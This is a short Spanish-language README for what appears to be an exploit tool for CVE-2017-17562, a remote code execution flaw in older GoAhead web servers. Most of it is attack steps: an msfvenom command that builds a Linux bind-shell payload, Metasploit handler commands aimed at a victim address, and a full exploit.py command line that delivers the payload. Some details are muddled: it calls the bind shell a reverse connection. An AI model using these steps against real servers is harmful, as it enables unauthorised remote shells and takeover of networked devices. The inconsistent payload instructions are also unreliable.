
Exploit para la vulnerabilidad CVE-2017-17562, que permite RCE en GoAhead (< v3.6.5) si CGI está habilitado y un programa CGI está enlazado dinámicamente.
Exploit para la vulnerabilidad CVE-2017-17562, que permite RCE en GoAhead (< v3.6.5) si CGI está habilitado y un programa CGI está enlazado dinámicamente.
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]
$ python3 -m pip install -r requirements.txt
Primero necesitas generar el payload y configurar la conexión de escucha.
Ejemplo:
(Atacante: 192.168.1.100 - Víctima: 192.168.1.200)
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337
Luego, en otra terminal, debes ejecutar este exploit para enviar el payload que iniciará la conexión inversa al listener.
Required arguments:
--host HOST Host running the GoAhead webserver.
--port PORT Port running the GoAhead webserver. Default: 80
--payload PAYLOAD Path to the payload.
Optional arguments:
--ssl Host is using SSL.
--cgi LIST Paths list to discover the CGI script on the GoAhead server. Default: paths.lst
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl